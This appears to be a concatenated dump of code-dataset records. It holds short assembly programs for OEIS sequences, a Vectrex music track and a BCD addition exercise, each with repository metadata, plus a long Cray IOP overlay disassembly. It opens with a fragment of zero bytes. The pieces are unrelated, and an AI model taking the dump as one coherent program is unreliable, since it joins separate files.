00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
*/
| 42.806452 | 2,999 | 0.654484 |
7262ba61620ca06a480c7eca8f0f6009db2b8c8b | 1,109 | asm | Assembly | programs/oeis/072/A072834.asm | karttu/loda | 9c3b0fc57b810302220c044a9d17db733c76a598 | [
"Apache-2.0"
] | 1 | 2021-03-15T11:38:20.000Z | 2021-03-15T11:38:20.000Z | programs/oeis/072/A072834.asm | karttu/loda | 9c3b0fc57b810302220c044a9d17db733c76a598 | [
"Apache-2.0"
] | null | null | null | programs/oeis/072/A072834.asm | karttu/loda | 9c3b0fc57b810302220c044a9d17db733c76a598 | [
"Apache-2.0"
] | null | null | null | ; A072834: Exponents occurring in expansion of F_8(q^2).
; 0,7,12,15,16,23,28,31,32,39,44,47,48,55,60,63,64,71,76,79,80,87,92,95,96,103,108,111,112,119,124,127,128,135,140,143,144,151,156,159,160,167,172,175,176,183,188,191,192,199,204,207,208,215,220,223,224,231,236,239,240,247,252,255,256,263,268,271,272,279,284,287,288,295,300,303,304,311,316,319,320,327,332,335,336,343,348,351,352,359,364,367,368,375,380,383,384,391,396,399,400,407,412,415,416,423,428,431,432,439,444,447,448,455,460,463,464,471,476,479,480,487,492,495,496,503,508,511,512,519,524,527,528,535,540,543,544,551,556,559,560,567,572,575,576,583,588,591,592,599,604,607,608,615,620,623,624,631,636,639,640,647,652,655,656,663,668,671,672,679,684,687,688,695,700,703,704,711,716,719,720,727,732,735,736,743,748,751,752,759,764,767,768,775,780,783,784,791,796,799,800,807,812,815,816,823,828,831,832,839,844,847,848,855,860,863,864,871,876,879,880,887,892,895,896,903,908,911,912,919,924,927,928,935,940,943,944,951,956,959,960,967,972,975,976,983,988,991,992,999
mov $3,$0
pow $0,2
mul $0,3
mov $1,$0
mod $1,8
mov $2,$3
mul $2,4
add $1,$2
| 92.416667 | 974 | 0.726781 |
764a74430a7ace7f14c313bfecd5367b3057a9dc | 606 | asm | Assembly | oeis/077/A077966.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 11 | 2021-08-22T19:44:55.000Z | 2022-03-20T16:47:57.000Z | oeis/077/A077966.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 9 | 2021-08-29T13:15:54.000Z | 2022-03-09T19:52:31.000Z | oeis/077/A077966.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 3 | 2021-08-22T20:56:47.000Z | 2021-09-29T06:26:12.000Z | ; A077966: Expansion of 1/(1+2*x^2).
; 1,0,-2,0,4,0,-8,0,16,0,-32,0,64,0,-128,0,256,0,-512,0,1024,0,-2048,0,4096,0,-8192,0,16384,0,-32768,0,65536,0,-131072,0,262144,0,-524288,0,1048576,0,-2097152,0,4194304,0,-8388608,0,16777216,0,-33554432,0,67108864,0,-134217728,0,268435456,0,-536870912,0,1073741824,0,-2147483648,0,4294967296,0,-8589934592,0,17179869184,0,-34359738368,0,68719476736,0,-137438953472,0,274877906944,0,-549755813888,0,1099511627776,0,-2199023255552,0,4398046511104,0,-8796093022208,0,17592186044416,0,-35184372088832,0
sub $2,$0
add $0,2
sub $1,$0
sub $1,$2
dif $2,$1
pow $1,$2
mov $0,$1
| 55.090909 | 498 | 0.726073 |
3617924bda6e317e42bcb17737e1aab9a481b63d | 141 | asm | Assembly | malban/Release/VRelease/Release.History/VRelease_2017_04_14/Song/track_19_02.asm | mikepea/vectrex-playground | 0de7d2d6db0914d915f4334402f747ab3bcdc7e6 | [
"0BSD"
] | 5 | 2018-01-14T10:03:50.000Z | 2020-01-17T13:53:49.000Z | malban/Release/VRelease/Release.History/VRelease_2017_04_23/Song/track_19_02.asm | mikepea/vectrex-playground | 0de7d2d6db0914d915f4334402f747ab3bcdc7e6 | [
"0BSD"
] | null | null | null | malban/Release/VRelease/Release.History/VRelease_2017_04_23/Song/track_19_02.asm | mikepea/vectrex-playground | 0de7d2d6db0914d915f4334402f747ab3bcdc7e6 | [
"0BSD"
] | null | null | null | dw $0010
track_19_02:
db $FF, $FC, $A6, $3F, $18, $F9, $7E, $96, $3D, $7F
db $29, $8F, $26, $3C, $18, $ED, $7E, $96, $3A, $7F
db $29, $80 | 28.2 | 52 | 0.475177 |
cc16f56a8d5ded858902fbf171e96e588acdd359 | 680 | asm | Assembly | oeis/053/A053296.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 11 | 2021-08-22T19:44:55.000Z | 2022-03-20T16:47:57.000Z | oeis/053/A053296.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 9 | 2021-08-29T13:15:54.000Z | 2022-03-09T19:52:31.000Z | oeis/053/A053296.asm | neoneye/loda-programs | 84790877f8e6c2e821b183d2e334d612045d29c0 | [
"Apache-2.0"
] | 3 | 2021-08-22T20:56:47.000Z | 2021-09-29T06:26:12.000Z | ; A053296: Partial sums of A053295.
; Submitted by Christian Krause
; 1,8,37,129,376,967,2267,4950,10220,20175,38403,70954,127921,226007,392688,672959,1140260,1914166,3189022,5280288,8699540,14275838,23352118,38102976,62048869,100888126,163843187,265838881,431026972,698489013,1131463777,1832277574,2966502032,4802042229,7772382641,12578921258,20356549685,32941567397,53305176134,86254888591,139569431544,225835057708,365416760764,591265802288,956698453752,1547982265500,2504701077772,4052706300752,6557433205689,10610168496116,17167634170241,27777838954609
mov $3,13
lpb $0
mov $2,$3
div $2,2
add $2,$0
bin $2,$0
sub $0,1
add $1,$2
add $3,1
lpe
mov $0,$1
add $0,1
| 40 | 489 | 0.804412 |
0ee85a2bf7f3960cc21768308008f12ab4d697af | 618 | asm | Assembly | Exp2_Sequence_structure_and_branch_structure_programming/Exp2_1_COMP_BCD_Plus.asm | LiamSho/assembly_language_course | 31f5eb901932fb5933c80f480bbbdd059c4383b2 | [
"WTFPL"
] | null | null | null | Exp2_Sequence_structure_and_branch_structure_programming/Exp2_1_COMP_BCD_Plus.asm | LiamSho/assembly_language_course | 31f5eb901932fb5933c80f480bbbdd059c4383b2 | [
"WTFPL"
] | null | null | null | Exp2_Sequence_structure_and_branch_structure_programming/Exp2_1_COMP_BCD_Plus.asm | LiamSho/assembly_language_course | 31f5eb901932fb5933c80f480bbbdd059c4383b2 | [
"WTFPL"
] | null | null | null | ; 实验2-1 压缩BCD码加法
;
; 压缩型BCD码加法运算,一共4组数据,
; 结果存储在 RESULT 中,无输出,需使用
; 调试工具查看 DS:0000 - DS:000B
DATAS SEGMENT
BCD1 DB 34H, 55H, 12H, 92H
BCD2 DB 56H, 23H, 15H, 11H
RESULT DB 4 DUP(?)
DATAS ENDS
CODES SEGMENT
ASSUME CS:CODES, DS:DATAS
START:
MOV AX, DATAS
MOV DS, AX
XOR AX, AX
MOV CX, 04H ;计算循环计数
MOV BX, 00H ;计算顺序计数
CALT:
MOV AL, BCD1[BX]
ADC AL, BCD2[BX]
DAA ;压缩型BCD码调整
MOV RESULT[BX], AL
INC BX
LOOP CALT
FIN:
MOV AH, 4CH
INT 21H
CODES ENDS
END START
| 17.657143 | 38 | 0.519417 |
72d372762d944ce12743a89d9a8d15d229e56dd7 | 40,640 | asm | Assembly | target/cos_117/disasm/iop_overlay1/PLOT0.asm | jrrk2/cray-sim | 52c9639808d6890517092637b188282c00cce4f7 | [
"BSL-1.0"
] | 49 | 2020-10-09T12:29:16.000Z | 2022-03-12T02:33:35.000Z | target/cos_117/disasm/iop_overlay1/PLOT0.asm | jrrk2/cray-sim | 52c9639808d6890517092637b188282c00cce4f7 | [
"BSL-1.0"
] | 1 | 2021-12-29T15:59:25.000Z | 2021-12-29T15:59:25.000Z | target/cos_117/disasm/iop_overlay1/PLOT0.asm | jrrk2/cray-sim | 52c9639808d6890517092637b188282c00cce4f7 | [
"BSL-1.0"
] | 6 | 2021-04-12T06:10:32.000Z | 2022-02-08T23:11:19.000Z | 0x0000 (0x000000) 0x1000- f:00010 d: 0 | A = 0 (0x0000)
0x0001 (0x000002) 0x2919- f:00024 d: 281 | OR[281] = A
0x0002 (0x000004) 0x1000- f:00010 d: 0 | A = 0 (0x0000)
0x0003 (0x000006) 0x291A- f:00024 d: 282 | OR[282] = A
0x0004 (0x000008) 0x1000- f:00010 d: 0 | A = 0 (0x0000)
0x0005 (0x00000A) 0x291B- f:00024 d: 283 | OR[283] = A
0x0006 (0x00000C) 0x1000- f:00010 d: 0 | A = 0 (0x0000)
0x0007 (0x00000E) 0x291C- f:00024 d: 284 | OR[284] = A
0x0008 (0x000010) 0x1000- f:00010 d: 0 | A = 0 (0x0000)
0x0009 (0x000012) 0x291D- f:00024 d: 285 | OR[285] = A
0x000A (0x000014) 0x1000- f:00010 d: 0 | A = 0 (0x0000)
0x000B (0x000016) 0x291E- f:00024 d: 286 | OR[286] = A
0x000C (0x000018) 0x746D- f:00072 d: 109 | R = P + 109 (0x0079)
0x000D (0x00001A) 0x7554- f:00072 d: 340 | R = P + 340 (0x0161)
0x000E (0x00001C) 0x101A- f:00010 d: 26 | A = 26 (0x001A)
0x000F (0x00001E) 0x2928- f:00024 d: 296 | OR[296] = A
0x0010 (0x000020) 0x111D- f:00010 d: 285 | A = 285 (0x011D)
0x0011 (0x000022) 0x2929- f:00024 d: 297 | OR[297] = A
0x0012 (0x000024) 0x1128- f:00010 d: 296 | A = 296 (0x0128)
0x0013 (0x000026) 0x5800- f:00054 d: 0 | B = A
0x0014 (0x000028) 0x1000- f:00010 d: 0 | A = 0 (0x0000)
0x0015 (0x00002A) 0x7C09- f:00076 d: 9 | R = OR[9]
0x0016 (0x00002C) 0x8602- f:00103 d: 2 | P = P + 2 (0x0018), A # 0
0x0017 (0x00002E) 0x700B- f:00070 d: 11 | P = P + 11 (0x0022)
0x0018 (0x000030) 0x1007- f:00010 d: 7 | A = 7 (0x0007)
0x0019 (0x000032) 0x2928- f:00024 d: 296 | OR[296] = A
0x001A (0x000034) 0x1001- f:00010 d: 1 | A = 1 (0x0001)
0x001B (0x000036) 0x2929- f:00024 d: 297 | OR[297] = A
0x001C (0x000038) 0x1128- f:00010 d: 296 | A = 296 (0x0128)
0x001D (0x00003A) 0x5800- f:00054 d: 0 | B = A
0x001E (0x00003C) 0x1800-0x2118 f:00014 d: 0 | A = 8472 (0x2118)
0x0020 (0x000040) 0x7C09- f:00076 d: 9 | R = OR[9]
0x0021 (0x000042) 0x7213- f:00071 d: 19 | P = P - 19 (0x000E)
0x0022 (0x000044) 0x1018- f:00010 d: 24 | A = 24 (0x0018)
0x0023 (0x000046) 0x2928- f:00024 d: 296 | OR[296] = A
0x0024 (0x000048) 0x1042- f:00010 d: 66 | A = 66 (0x0042)
0x0025 (0x00004A) 0x2929- f:00024 d: 297 | OR[297] = A
0x0026 (0x00004C) 0x1000- f:00010 d: 0 | A = 0 (0x0000)
0x0027 (0x00004E) 0x292A- f:00024 d: 298 | OR[298] = A
0x0028 (0x000050) 0x1000- f:00010 d: 0 | A = 0 (0x0000)
0x0029 (0x000052) 0x292B- f:00024 d: 299 | OR[299] = A
0x002A (0x000054) 0x1000- f:00010 d: 0 | A = 0 (0x0000)
0x002B (0x000056) 0x292C- f:00024 d: 300 | OR[300] = A
0x002C (0x000058) 0x111E- f:00010 d: 286 | A = 286 (0x011E)
0x002D (0x00005A) 0x292D- f:00024 d: 301 | OR[301] = A
0x002E (0x00005C) 0x1128- f:00010 d: 296 | A = 296 (0x0128)
0x002F (0x00005E) 0x5800- f:00054 d: 0 | B = A
0x0030 (0x000060) 0x1000- f:00010 d: 0 | A = 0 (0x0000)
0x0031 (0x000062) 0x7C09- f:00076 d: 9 | R = OR[9]
0x0032 (0x000064) 0x8602- f:00103 d: 2 | P = P + 2 (0x0034), A # 0
0x0033 (0x000066) 0x700B- f:00070 d: 11 | P = P + 11 (0x003E)
0x0034 (0x000068) 0x1007- f:00010 d: 7 | A = 7 (0x0007)
0x0035 (0x00006A) 0x2928- f:00024 d: 296 | OR[296] = A
0x0036 (0x00006C) 0x1001- f:00010 d: 1 | A = 1 (0x0001)
0x0037 (0x00006E) 0x2929- f:00024 d: 297 | OR[297] = A
0x0038 (0x000070) 0x1128- f:00010 d: 296 | A = 296 (0x0128)
0x0039 (0x000072) 0x5800- f:00054 d: 0 | B = A
0x003A (0x000074) 0x1800-0x2118 f:00014 d: 0 | A = 8472 (0x2118)
0x003C (0x000078) 0x7C09- f:00076 d: 9 | R = OR[9]
0x003D (0x00007A) 0x721B- f:00071 d: 27 | P = P - 27 (0x0022)
0x003E (0x00007C) 0x211E- f:00020 d: 286 | A = OR[286]
0x003F (0x00007E) 0x290E- f:00024 d: 270 | OR[270] = A
0x0040 (0x000080) 0x1042- f:00010 d: 66 | A = 66 (0x0042)
0x0041 (0x000082) 0x290D- f:00024 d: 269 | OR[269] = A
0x0042 (0x000084) 0x210D- f:00020 d: 269 | A = OR[269]
0x0043 (0x000086) 0x8406- f:00102 d: 6 | P = P + 6 (0x0049), A = 0
0x0044 (0x000088) 0x1000- f:00010 d: 0 | A = 0 (0x0000)
0x0045 (0x00008A) 0x390E- f:00034 d: 270 | (OR[270]) = A
0x0046 (0x00008C) 0x2F0D- f:00027 d: 269 | OR[269] = OR[269] - 1
0x0047 (0x00008E) 0x2D0E- f:00026 d: 270 | OR[270] = OR[270] + 1
0x0048 (0x000090) 0x7206- f:00071 d: 6 | P = P - 6 (0x0042)
0x0049 (0x000092) 0x1000- f:00010 d: 0 | A = 0 (0x0000)
0x004A (0x000094) 0x291F- f:00024 d: 287 | OR[287] = A
0x004B (0x000096) 0x211F- f:00020 d: 287 | A = OR[287]
0x004C (0x000098) 0x8604- f:00103 d: 4 | P = P + 4 (0x0050), A # 0
0x004D (0x00009A) 0x7481- f:00072 d: 129 | R = P + 129 (0x00CE)
0x004E (0x00009C) 0x753B- f:00072 d: 315 | R = P + 315 (0x0189)
0x004F (0x00009E) 0x7204- f:00071 d: 4 | P = P - 4 (0x004B)
0x0050 (0x0000A0) 0x211E- f:00020 d: 286 | A = OR[286]
0x0051 (0x0000A2) 0x8602- f:00103 d: 2 | P = P + 2 (0x0053), A # 0
0x0052 (0x0000A4) 0x7009- f:00070 d: 9 | P = P + 9 (0x005B)
0x0053 (0x0000A6) 0x1019- f:00010 d: 25 | A = 25 (0x0019)
0x0054 (0x0000A8) 0x2928- f:00024 d: 296 | OR[296] = A
0x0055 (0x0000AA) 0x211E- f:00020 d: 286 | A = OR[286]
0x0056 (0x0000AC) 0x2929- f:00024 d: 297 | OR[297] = A
0x0057 (0x0000AE) 0x1128- f:00010 d: 296 | A = 296 (0x0128)
0x0058 (0x0000B0) 0x5800- f:00054 d: 0 | B = A
0x0059 (0x0000B2) 0x1000- f:00010 d: 0 | A = 0 (0x0000)
0x005A (0x0000B4) 0x7C09- f:00076 d: 9 | R = OR[9]
0x005B (0x0000B6) 0x211D- f:00020 d: 285 | A = OR[285]
0x005C (0x0000B8) 0x8602- f:00103 d: 2 | P = P + 2 (0x005E), A # 0
0x005D (0x0000BA) 0x7009- f:00070 d: 9 | P = P + 9 (0x0066)
0x005E (0x0000BC) 0x101B- f:00010 d: 27 | A = 27 (0x001B)
0x005F (0x0000BE) 0x2928- f:00024 d: 296 | OR[296] = A
0x0060 (0x0000C0) 0x211D- f:00020 d: 285 | A = OR[285]
0x0061 (0x0000C2) 0x2929- f:00024 d: 297 | OR[297] = A
0x0062 (0x0000C4) 0x1128- f:00010 d: 296 | A = 296 (0x0128)
0x0063 (0x0000C6) 0x5800- f:00054 d: 0 | B = A
0x0064 (0x0000C8) 0x1000- f:00010 d: 0 | A = 0 (0x0000)
0x0065 (0x0000CA) 0x7C09- f:00076 d: 9 | R = OR[9]
0x0066 (0x0000CC) 0x211C- f:00020 d: 284 | A = OR[284]
0x0067 (0x0000CE) 0x8602- f:00103 d: 2 | P = P + 2 (0x0069), A # 0
0x0068 (0x0000D0) 0x7002- f:00070 d: 2 | P = P + 2 (0x006A)
0x0069 (0x0000D2) 0x7589- f:00072 d: 393 | R = P + 393 (0x01F2)
0x006A (0x0000D4) 0x211A- f:00020 d: 282 | A = OR[282]
0x006B (0x0000D6) 0x8602- f:00103 d: 2 | P = P + 2 (0x006D), A # 0
0x006C (0x0000D8) 0x7002- f:00070 d: 2 | P = P + 2 (0x006E)
0x006D (0x0000DA) 0x74A3- f:00072 d: 163 | R = P + 163 (0x0110)
0x006E (0x0000DC) 0x2005- f:00020 d: 5 | A = OR[5]
0x006F (0x0000DE) 0x1406- f:00012 d: 6 | A = A + 6 (0x0006)
0x0070 (0x0000E0) 0x2908- f:00024 d: 264 | OR[264] = A
0x0071 (0x0000E2) 0x2119- f:00020 d: 281 | A = OR[281]
0x0072 (0x0000E4) 0x3908- f:00034 d: 264 | (OR[264]) = A
0x0073 (0x0000E6) 0x102A- f:00010 d: 42 | A = 42 (0x002A)
0x0074 (0x0000E8) 0x2928- f:00024 d: 296 | OR[296] = A
0x0075 (0x0000EA) 0x1128- f:00010 d: 296 | A = 296 (0x0128)
0x0076 (0x0000EC) 0x5800- f:00054 d: 0 | B = A
0x0077 (0x0000EE) 0x1000- f:00010 d: 0 | A = 0 (0x0000)
0x0078 (0x0000F0) 0x7C09- f:00076 d: 9 | R = OR[9]
0x0079 (0x0000F2) 0x2118- f:00020 d: 280 | A = OR[280]
0x007A (0x0000F4) 0x1401- f:00012 d: 1 | A = A + 1 (0x0001)
0x007B (0x0000F6) 0x2908- f:00024 d: 264 | OR[264] = A
0x007C (0x0000F8) 0x3108- f:00030 d: 264 | A = (OR[264])
0x007D (0x0000FA) 0x2920- f:00024 d: 288 | OR[288] = A
0x007E (0x0000FC) 0x2120- f:00020 d: 288 | A = OR[288]
0x007F (0x0000FE) 0x290D- f:00024 d: 269 | OR[269] = A
0x0080 (0x000100) 0x1000- f:00010 d: 0 | A = 0 (0x0000)
0x0081 (0x000102) 0x290E- f:00024 d: 270 | OR[270] = A
0x0082 (0x000104) 0x2006- f:00020 d: 6 | A = OR[6]
0x0083 (0x000106) 0x2910- f:00024 d: 272 | OR[272] = A
0x0084 (0x000108) 0x1028- f:00010 d: 40 | A = 40 (0x0028)
0x0085 (0x00010A) 0x2928- f:00024 d: 296 | OR[296] = A
0x0086 (0x00010C) 0x1800-0x00A9 f:00014 d: 0 | A = 169 (0x00A9)
0x0088 (0x000110) 0x2929- f:00024 d: 297 | OR[297] = A
0x0089 (0x000112) 0x1800-0x444B f:00014 d: 0 | A = 17483 (0x444B)
0x008B (0x000116) 0x292A- f:00024 d: 298 | OR[298] = A
0x008C (0x000118) 0x210D- f:00020 d: 269 | A = OR[269]
0x008D (0x00011A) 0x292B- f:00024 d: 299 | OR[299] = A
0x008E (0x00011C) 0x1003- f:00010 d: 3 | A = 3 (0x0003)
0x008F (0x00011E) 0x292C- f:00024 d: 300 | OR[300] = A
0x0090 (0x000120) 0x210E- f:00020 d: 270 | A = OR[270]
0x0091 (0x000122) 0x292D- f:00024 d: 301 | OR[301] = A
0x0092 (0x000124) 0x210F- f:00020 d: 271 | A = OR[271]
0x0093 (0x000126) 0x292E- f:00024 d: 302 | OR[302] = A
0x0094 (0x000128) 0x2110- f:00020 d: 272 | A = OR[272]
0x0095 (0x00012A) 0x292F- f:00024 d: 303 | OR[303] = A
0x0096 (0x00012C) 0x100E- f:00010 d: 14 | A = 14 (0x000E)
0x0097 (0x00012E) 0x2930- f:00024 d: 304 | OR[304] = A
0x0098 (0x000130) 0x1128- f:00010 d: 296 | A = 296 (0x0128)
0x0099 (0x000132) 0x5800- f:00054 d: 0 | B = A
0x009A (0x000134) 0x1800-0x2118 f:00014 d: 0 | A = 8472 (0x2118)
0x009C (0x000138) 0x7C09- f:00076 d: 9 | R = OR[9]
0x009D (0x00013A) 0x2919- f:00024 d: 281 | OR[281] = A
0x009E (0x00013C) 0x2119- f:00020 d: 281 | A = OR[281]
0x009F (0x00013E) 0x8602- f:00103 d: 2 | P = P + 2 (0x00A1), A # 0
0x00A0 (0x000140) 0x7002- f:00070 d: 2 | P = P + 2 (0x00A2)
0x00A1 (0x000142) 0x7095- f:00070 d: 149 | P = P + 149 (0x0136)
0x00A2 (0x000144) 0x2118- f:00020 d: 280 | A = OR[280]
0x00A3 (0x000146) 0x1402- f:00012 d: 2 | A = A + 2 (0x0002)
0x00A4 (0x000148) 0x2921- f:00024 d: 289 | OR[289] = A
0x00A5 (0x00014A) 0x2118- f:00020 d: 280 | A = OR[280]
0x00A6 (0x00014C) 0x140A- f:00012 d: 10 | A = A + 10 (0x000A)
0x00A7 (0x00014E) 0x2922- f:00024 d: 290 | OR[290] = A
0x00A8 (0x000150) 0x1028- f:00010 d: 40 | A = 40 (0x0028)
0x00A9 (0x000152) 0x2928- f:00024 d: 296 | OR[296] = A
0x00AA (0x000154) 0x1800-0x00E7 f:00014 d: 0 | A = 231 (0x00E7)
0x00AC (0x000158) 0x2929- f:00024 d: 297 | OR[297] = A
0x00AD (0x00015A) 0x211A- f:00020 d: 282 | A = OR[282]
0x00AE (0x00015C) 0x292A- f:00024 d: 298 | OR[298] = A
0x00AF (0x00015E) 0x2121- f:00020 d: 289 | A = OR[289]
0x00B0 (0x000160) 0x292B- f:00024 d: 299 | OR[299] = A
0x00B1 (0x000162) 0x2122- f:00020 d: 290 | A = OR[290]
0x00B2 (0x000164) 0x292C- f:00024 d: 300 | OR[300] = A
0x00B3 (0x000166) 0x100F- f:00010 d: 15 | A = 15 (0x000F)
0x00B4 (0x000168) 0x292D- f:00024 d: 301 | OR[301] = A
0x00B5 (0x00016A) 0x1017- f:00010 d: 23 | A = 23 (0x0017)
0x00B6 (0x00016C) 0x292E- f:00024 d: 302 | OR[302] = A
0x00B7 (0x00016E) 0x1018- f:00010 d: 24 | A = 24 (0x0018)
0x00B8 (0x000170) 0x292F- f:00024 d: 303 | OR[303] = A
0x00B9 (0x000172) 0x1128- f:00010 d: 296 | A = 296 (0x0128)
0x00BA (0x000174) 0x5800- f:00054 d: 0 | B = A
0x00BB (0x000176) 0x1800-0x2118 f:00014 d: 0 | A = 8472 (0x2118)
0x00BD (0x00017A) 0x7C09- f:00076 d: 9 | R = OR[9]
0x00BE (0x00017C) 0x2919- f:00024 d: 281 | OR[281] = A
0x00BF (0x00017E) 0x2119- f:00020 d: 281 | A = OR[281]
0x00C0 (0x000180) 0x8602- f:00103 d: 2 | P = P + 2 (0x00C2), A # 0
0x00C1 (0x000182) 0x7002- f:00070 d: 2 | P = P + 2 (0x00C3)
0x00C2 (0x000184) 0x7074- f:00070 d: 116 | P = P + 116 (0x0136)
0x00C3 (0x000186) 0x2118- f:00020 d: 280 | A = OR[280]
0x00C4 (0x000188) 0x1412- f:00012 d: 18 | A = A + 18 (0x0012)
0x00C5 (0x00018A) 0x2908- f:00024 d: 264 | OR[264] = A
0x00C6 (0x00018C) 0x2123- f:00020 d: 291 | A = OR[291]
0x00C7 (0x00018E) 0x3908- f:00034 d: 264 | (OR[264]) = A
0x00C8 (0x000190) 0x2118- f:00020 d: 280 | A = OR[280]
0x00C9 (0x000192) 0x1413- f:00012 d: 19 | A = A + 19 (0x0013)
0x00CA (0x000194) 0x2908- f:00024 d: 264 | OR[264] = A
0x00CB (0x000196) 0x2124- f:00020 d: 292 | A = OR[292]
0x00CC (0x000198) 0x3908- f:00034 d: 264 | (OR[264]) = A
0x00CD (0x00019A) 0x0200- f:00001 d: 0 | EXIT
0x00CE (0x00019C) 0x211D- f:00020 d: 285 | A = OR[285]
0x00CF (0x00019E) 0x290E- f:00024 d: 270 | OR[270] = A
0x00D0 (0x0001A0) 0x1800-0x0800 f:00014 d: 0 | A = 2048 (0x0800)
0x00D2 (0x0001A4) 0x290D- f:00024 d: 269 | OR[269] = A
0x00D3 (0x0001A6) 0x210D- f:00020 d: 269 | A = OR[269]
0x00D4 (0x0001A8) 0x8406- f:00102 d: 6 | P = P + 6 (0x00DA), A = 0
0x00D5 (0x0001AA) 0x1000- f:00010 d: 0 | A = 0 (0x0000)
0x00D6 (0x0001AC) 0x390E- f:00034 d: 270 | (OR[270]) = A
0x00D7 (0x0001AE) 0x2F0D- f:00027 d: 269 | OR[269] = OR[269] - 1
0x00D8 (0x0001B0) 0x2D0E- f:00026 d: 270 | OR[270] = OR[270] + 1
0x00D9 (0x0001B2) 0x7206- f:00071 d: 6 | P = P - 6 (0x00D3)
0x00DA (0x0001B4) 0x2123- f:00020 d: 291 | A = OR[291]
0x00DB (0x0001B6) 0x8402- f:00102 d: 2 | P = P + 2 (0x00DD), A = 0
0x00DC (0x0001B8) 0x700D- f:00070 d: 13 | P = P + 13 (0x00E9)
0x00DD (0x0001BA) 0x2124- f:00020 d: 292 | A = OR[292]
0x00DE (0x0001BC) 0x1E00-0x0200 f:00017 d: 0 | A = A - 512 (0x0200)
0x00E0 (0x0001C0) 0x8002- f:00100 d: 2 | P = P + 2 (0x00E2), C = 0
0x00E1 (0x0001C2) 0x8602- f:00103 d: 2 | P = P + 2 (0x00E3), A # 0
0x00E2 (0x0001C4) 0x7002- f:00070 d: 2 | P = P + 2 (0x00E4)
0x00E3 (0x0001C6) 0x7006- f:00070 d: 6 | P = P + 6 (0x00E9)
0x00E4 (0x0001C8) 0x2124- f:00020 d: 292 | A = OR[292]
0x00E5 (0x0001CA) 0x2925- f:00024 d: 293 | OR[293] = A
0x00E6 (0x0001CC) 0x1001- f:00010 d: 1 | A = 1 (0x0001)
0x00E7 (0x0001CE) 0x291F- f:00024 d: 287 | OR[287] = A
0x00E8 (0x0001D0) 0x700D- f:00070 d: 13 | P = P + 13 (0x00F5)
0x00E9 (0x0001D2) 0x1800-0x0200 f:00014 d: 0 | A = 512 (0x0200)
0x00EB (0x0001D6) 0x2925- f:00024 d: 293 | OR[293] = A
0x00EC (0x0001D8) 0x1001- f:00010 d: 1 | A = 1 (0x0001)
0x00ED (0x0001DA) 0x290F- f:00024 d: 271 | OR[271] = A
0x00EE (0x0001DC) 0x2124- f:00020 d: 292 | A = OR[292]
0x00EF (0x0001DE) 0x2725- f:00023 d: 293 | A = A - OR[293]
0x00F0 (0x0001E0) 0x2924- f:00024 d: 292 | OR[292] = A
0x00F1 (0x0001E2) 0x8202- f:00101 d: 2 | P = P + 2 (0x00F3), C = 1
0x00F2 (0x0001E4) 0x2F23- f:00027 d: 291 | OR[291] = OR[291] - 1
0x00F3 (0x0001E6) 0x0810- f:00004 d: 16 | A = A > 16 (0x0010)
0x00F4 (0x0001E8) 0x230F- f:00021 d: 271 | A = A & OR[271]
0x00F5 (0x0001EA) 0x1028- f:00010 d: 40 | A = 40 (0x0028)
0x00F6 (0x0001EC) 0x2928- f:00024 d: 296 | OR[296] = A
0x00F7 (0x0001EE) 0x1800-0x00F2 f:00014 d: 0 | A = 242 (0x00F2)
0x00F9 (0x0001F2) 0x2929- f:00024 d: 297 | OR[297] = A
0x00FA (0x0001F4) 0x211A- f:00020 d: 282 | A = OR[282]
0x00FB (0x0001F6) 0x292A- f:00024 d: 298 | OR[298] = A
0x00FC (0x0001F8) 0x211B- f:00020 d: 283 | A = OR[283]
0x00FD (0x0001FA) 0x292B- f:00024 d: 299 | OR[299] = A
0x00FE (0x0001FC) 0x1001- f:00010 d: 1 | A = 1 (0x0001)
0x00FF (0x0001FE) 0x292C- f:00024 d: 300 | OR[300] = A
0x0100 (0x000200) 0x1800-0xFFFF f:00014 d: 0 | A = 65535 (0xFFFF)
0x0102 (0x000204) 0x292D- f:00024 d: 301 | OR[301] = A
0x0103 (0x000206) 0x211D- f:00020 d: 285 | A = OR[285]
0x0104 (0x000208) 0x292E- f:00024 d: 302 | OR[302] = A
0x0105 (0x00020A) 0x1128- f:00010 d: 296 | A = 296 (0x0128)
0x0106 (0x00020C) 0x5800- f:00054 d: 0 | B = A
0x0107 (0x00020E) 0x1800-0x2118 f:00014 d: 0 | A = 8472 (0x2118)
0x0109 (0x000212) 0x7C09- f:00076 d: 9 | R = OR[9]
0x010A (0x000214) 0x2919- f:00024 d: 281 | OR[281] = A
0x010B (0x000216) 0x2119- f:00020 d: 281 | A = OR[281]
0x010C (0x000218) 0x8602- f:00103 d: 2 | P = P + 2 (0x010E), A # 0
0x010D (0x00021A) 0x7002- f:00070 d: 2 | P = P + 2 (0x010F)
